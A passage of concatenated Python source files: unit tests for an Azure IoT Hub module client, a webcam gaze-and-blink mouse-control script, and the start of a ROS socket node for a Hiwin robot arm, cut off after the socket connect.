@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control of a callback is required.
"""
return IoTHubModuleClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the MQTTPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_input_message_received is not None
assert (
client._mqtt_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubModuleClientCreateFromSastoken(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromSastokenTests
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .update_sastoken()")
class TestIoTHubModuleClientUpdateSasToken(
IoTHubModuleClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def module_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# module id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
module_id = token_uri_pieces[4]
return module_id
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
module_id = token_uri_pieces[4]
sas_config = IoTHubPipelineConfig(
hostname=hostname, device_id=device_id, module_id=module_id, sastoken=sastoken
)
return sas_config
@pytest.fixture
def uri(self, hostname, device_id, module_id):
return "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=hostname, device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=["Nonmatching Device ID", "Nonmatching Module ID", "Nonmatching Hostname"]
)
def nonmatching_uri(self, request, device_id, module_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
uri_format = "{hostname}/devices/{device_id}/modules/{module_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(
hostname=hostname, device_id="nonmatching_device", module_id=module_id
)
elif request.param == "Nonmatching Module ID":
return uri_format.format(
hostname=hostname, device_id=device_id, module_id="nonmatching_module"
)
else:
return uri_format.format(
hostname="nonmatching_hostname", device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=[
"Too short",
"Too long",
"Incorrectly formatted device notation",
"Incorrectly formatted module notation",
"Device URI",
]
)
def invalid_uri(self, request, device_id, module_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have module ID
return "{}/devices/{}/modules".format(hostname, device_id)
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/modules/{}/somethingElse".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}/modules/{}".format(hostname, device_id, module_id)
elif request.param == "Incorrectly formatted module notation":
# Doesn't have '/modules/'
return "{}/devices/{}/not-modules/{}".format(hostname, device_id, module_id)
else:
# Valid... for a Device... but this is a Module
return "{}/devices/{}/".format(hostname, device_id)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .connect()")
class TestIoTHubModuleClientConnect(IoTHubModuleClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .disconnect()")
class TestIoTHubModuleClientDisconnect(IoTHubModuleClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message()")
class TestIoTHubModuleClientSendD2CMessage(
IoTHubModuleClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_message_to_output()")
class TestIoTHubModuleClientSendToOutput(IoTHubModuleClientTestsConfig, WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_output_message' pipeline operation")
def test_calls_pipeline_send_message_to_output(self, client, mqtt_pipeline, message):
output_name = "some_output"
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
assert mqtt_pipeline.send_output_message.call_args[0][0] is message
assert message.output_name == output_name
@pytest.mark.it(
"Waits for the completion of the 'send_output_message' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, message
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_output_message
)
output_name = "some_output"
client_manual_cb.send_message_to_output(message, output_name)
@pytest.mark.it(
"Raises a client error if the `send_out_event` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
message,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_output_message,
kwargs={"error": my_pipeline_error},
)
output_name = "some_output"
with pytest.raises(client_error) as e_info:
client_manual_cb.send_message_to_output(message, output_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it(
"Wraps 'message' input parameter in Message object if it is not a Message object"
)
@pytest.mark.parametrize(
"message_input",
[
pytest.param("message", id="String input"),
pytest.param(222, id="Integer input"),
pytest.param(object(), id="Object input"),
pytest.param(None, id="None input"),
pytest.param([1, "str"], id="List input"),
pytest.param({"a": 2}, id="Dictionary input"),
],
)
def test_send_message_to_output_calls_pipeline_wraps_data_in_message(
self, client, mqtt_pipeline, message_input
):
output_name = "some_output"
client.send_message_to_output(message_input, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == message_input
@pytest.mark.it("Raises error when message data size is greater than 256 KB")
def test_raises_error_when_message_to_output_data_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia" * 256000
message = Message(data_input)
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Raises error when message size is greater than 256 KB")
def test_raises_error_when_message_to_output_size_greater_than_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "serpensortia"
message = Message(data_input)
message.custom_properties["spell"] = data_input * 256000
with pytest.raises(ValueError) as e_info:
client.send_message_to_output(message, output_name)
assert "256 KB" in e_info.value.args[0]
assert mqtt_pipeline.send_output_message.call_count == 0
@pytest.mark.it("Does not raises error when message data size is equal to 256 KB")
def test_raises_error_when_message_to_output_data_equal_to_256(self, client, mqtt_pipeline):
output_name = "some_output"
data_input = "a" * 262095
message = Message(data_input)
# This check exists because the Message class may undergo a default content type encoding
# change, which would alter the size calculation above.
# A greater-than check is used for Python 2 compatibility; ideally this would be a not-equal check.
if message.get_size() > device_constant.TELEMETRY_MESSAGE_SIZE_LIMIT:
assert False
client.send_message_to_output(message, output_name)
assert mqtt_pipeline.send_output_message.call_count == 1
sent_message = mqtt_pipeline.send_output_message.call_args[0][0]
assert isinstance(sent_message, Message)
assert sent_message.data == data_input
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_message_on_input()")
class TestIoTHubModuleClientReceiveInputMessage(IoTHubModuleClientTestsConfig):
@pytest.mark.it("Implicitly enables input messaging feature if not already enabled")
def test_enables_input_messaging_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline
):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_message_on_input won't block
input_name = "some_input"
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Input Messages will appear disabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.INPUT_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_message_on_input(input_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the input inbox, if available")
def test_returns_message_from_input_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
received_message = client.receive_message_on_input(input_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(input_name)
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
input_name = "some_input"
client.receive_message_on_input(input_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
input_name = "some_input"
input_inbox = client._inbox_manager.get_input_message_inbox(input_name)
assert input_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
input_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message_on_input(input_name, block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message_on_input
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
input_name = "some_input"
result = client.receive_message_on_input(input_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubModuleClientPROPERTYOnMessageReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.INPUT_MSG
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubModuleClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubModuleClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubModule (Synchronous) - PROPERTY .connected")
class TestIoTHubModuleClientPROPERTYConnected(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubModuleClientOCCURANCEConnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubModuleClientOCCURANCEDisconnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
|
final.py
|
import pyautogui
from imutils import face_utils
from scipy.spatial import distance as dist
import cv2
from Camera import camera
import imutils
import dlib
import numpy as np
import time
import os
from get_key import k_check
from Feature import contour
from modelsNN import inception_v3 as gnet
LR = 1e-3
WIDTH = 250
from threading import Thread
HEIGHT = 250
i=3
MODEL_NAME="CNN-{}".format(i)
LOAD_MODEL = True
count=0
a = [1,0,0,0,0,0,0,0,0]
b = [0,1,0,0,0,0,0,0,0]
c = [0,0,1,0,0,0,0,0,0]
d = [0,0,0,1,0,0,0,0,0]
e = [0,0,0,0,1,0,0,0,0]
f = [0,0,0,0,0,1,0,0,0]
g = [0,0,0,0,0,0,1,0,0]
h = [0,0,0,0,0,0,0,1,0]
nk = [0,0,0,0,0,0,0,0,1]
FN="FACIAL_LM.dat"
dl=dlib.shape_predictor(FN)
#urlstream="http://192.168.1.2:8080/video"
cam=camera.VideoFeed()
contour=contour.Contour(dl)
face=camera.Face()
COUNTER = 0
detector=face.cam()
EYE_THR = 0.3
EYE_CLOSE_FRAMES = 5
train_data=[]
STATE_CLICK=False
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
model = gnet(WIDTH, HEIGHT, 3, LR, output=9, model_name=MODEL_NAME)
if LOAD_MODEL:
model.load(MODEL_NAME)
print('loaded a previous model into inception_v3!!')
for i in list(range(4))[::-1]:
print(i+1)
time.sleep(.1)
print("Started..")
state_paused=False
COUNTER=0
def click():
pyautogui.click()
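# Blink-to-click: when the eye aspect ratio stays below EYE_THR for more than
# EYE_CLOSE_FRAMES consecutive frames, fire a single mouse click on a background thread.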
def click_mouse_action():
global COUNTER
global STATE_CLICK
if eye_ratio < EYE_THR:
COUNTER=COUNTER+1
if COUNTER > EYE_CLOSE_FRAMES:
if not STATE_CLICK:
STATE_CLICK = True
t = Thread(target=click,)
t.daemon = True
t.start()
else:
COUNTER = 0
STATE_CLICK = False
def choice2():
click_mouse_action()
print("looked R8 !! action took.....")
def choice1():
click_mouse_action()
print("looked left !! action took.....")
def eye_aspect_ratio(eye):
A = dist.euclidean(eye[1], eye[5])
B = dist.euclidean(eye[2], eye[4])
C = dist.euclidean(eye[0], eye[3])
ear = (A + B) / (2.0 * C)
return ear
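# Main loop: grab a frame, locate the facial landmarks, crop both eye regions, feed the
# right-eye ROI to the CNN to classify gaze direction, and map the predicted class to a
# mouse action. 'p' toggles pause, 'q' quits.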
while 1 and not state_paused:
frame=cam.getframe()
frame_2 = frame.copy()
framegray=cam.getframe(True)
coordpts=detector(frame,0)
coordpts=contour.dots(frame,coordpts)
if coordpts is not None:
for point in coordpts:
cv2.circle(frame, tuple(point), 1, (0, 0, 255))
lefteye=coordpts[lStart:lEnd]
righteye=coordpts[rStart:rEnd]
lefthull=cv2.convexHull(lefteye)
righthull=cv2.convexHull(righteye)
eye_ratio=eye_aspect_ratio(lefteye)
cv2.circle(frame, (int((righteye[0][0]+righteye[3][0])/2),int((righteye[0][1]+righteye[3][1])/2)), 1, (0, 0, 244), -1)
cv2.circle(frame, (int((lefteye[0][0]+lefteye[3][0])/2),int((lefteye[0][1]+lefteye[3][1])/2)), 1, (0, 0, 244), -1)
(x,y,w,h)=cv2.boundingRect(np.array([lefteye]))
(xr, yr, wr, hr) = cv2.boundingRect(np.array([righteye]))
off=10
roiL = imutils.resize(frame[y - off:y + off + h + off, x - off:x + w + off], width=250, height=250,
inter=cv2.INTER_CUBIC)
roiR = imutils.resize(frame[yr - off:yr + off + hr + off, xr - off:xr + wr + off], width=250, height=250,
inter=cv2.INTER_CUBIC)
roiL = cv2.resize(roiL, (250, 250))
roiR = cv2.resize(roiR, (250, 250))
roi_l = imutils.resize(frame_2[y-off:y+off+h+off,x-off:x+w+off], width=250, height=250,inter=cv2.INTER_CUBIC)
roi_r = imutils.resize(frame_2[yr-off:yr+off+hr+off,xr-off:xr+wr+off], width=250, height=250,inter=cv2.INTER_CUBIC)
roi_l_resized=cv2.resize(roi_l, (250, 250))
roi_r_resized = cv2.resize(roi_r, (250, 250))
# roi_lo=roi_l_resized
# roi_ro=roi_r_resized
roi_l_resized = cv2.cvtColor(roi_l_resized, cv2.COLOR_BGR2RGB)
roi_r_resized = cv2.cvtColor(roi_r_resized, cv2.COLOR_BGR2RGB)
if count>5:
prediction = model.predict([roi_r_resized.reshape(WIDTH,HEIGHT,3)])
np.round(prediction)
choice_pred_index = np.argmax(prediction)
print(choice_pred_index)
if choice_pred_index == 0:
## pyautogui.moveTo(598,570)
#pass
#choice1()
pass
elif choice_pred_index == 2:
## pyautogui.moveTo(196,586)
choice1()
pass
elif choice_pred_index == 4:
## pyautogui.moveTo(1203,597)
choice2()
pass
else:
pass
cv2.imshow("live feed - 1", roiL)
cv2.imshow("live feed - 2", roiR)
count=count+1
cv2.imshow("live feed",frame)
keys = k_check()
# 'p' pauses the loop and can get annoying.
if 'p' in keys:
if not state_paused:
state_paused = True
time.sleep(1)
else:
state_paused=False
time.sleep(1)
k=cv2.waitKey(23) & 0xFF
if k == ord('q'):
cv2.destroyAllWindows()
break
if __name__=="__main__":
pass
|
HiwinRA605_socket_ros_test_20190625193603.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them to the control-side computer via socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
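# Minimal switch/case emulation (a common recipe-style pattern): iterating the object yields a
# single match() callable; once a case matches, self.fall is set so later cases fall through
# until a break.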
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: do not raise StopIteration inside a generator
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req): ## receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive arm mode data sent from the strategy side
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive arm speed mode data sent from the strategy side
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## keep the node alive until shutdown
##------------server side end-------
##----------socket packet transmission--------------##
##-----------socket client--------
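# Socket client: connects to the control-side computer, builds a TCP command string for the
# currently requested action (PtP / Line / SetVel / Delay / SpeedMode) whenever the arm reports
# it is free, sends it, and relays the arm's busy/ready/finished state back through the
# 'arm_state' ROS service.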
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
